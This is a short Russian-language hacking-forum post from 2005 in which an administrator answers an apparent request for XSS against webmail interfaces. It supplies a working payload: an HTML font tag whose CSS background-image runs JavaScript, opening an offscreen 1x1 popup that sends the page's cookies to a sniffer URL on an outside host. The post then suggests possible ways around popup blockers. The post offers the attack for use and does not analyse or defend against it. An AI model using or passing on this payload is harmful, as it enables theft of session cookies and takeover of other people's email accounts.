01.04.2005, 21:19
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
Хмм ... Смею предположить, что это тебе нужно для проведения xss на почтовых веб-фейсах ))
Попробуй например это (хотя оно заблокируется):
Код:
<font color="black" style=background-image:url(JavaScript:window.open('http://antichat.ru/cgi-bin/s.jpg?'+document.cookie,'name_popup','location,width=1,height=1,top=9999,left=9999,scrollbar=0')) size=1>text</font>
Этот пример открывает попап размерами 1*1 вне видимой зоны экраны и загружает урл сниффера + кукисы текущего документа ...
<оффтопик>
Система блокирования всплывающих окон работает по принципу блокирования метода open(), связанного с объектом window, если я не ошибаюсь ... А методов обхода я не вижу ...
Возможная идея - это загрузка файла *.js как картинки в документе ... Возможно, что тогда окно не будет блокировано, т.к. вызывается он через картинку ...
Это только догадка ...
</oффтопик> |
|
|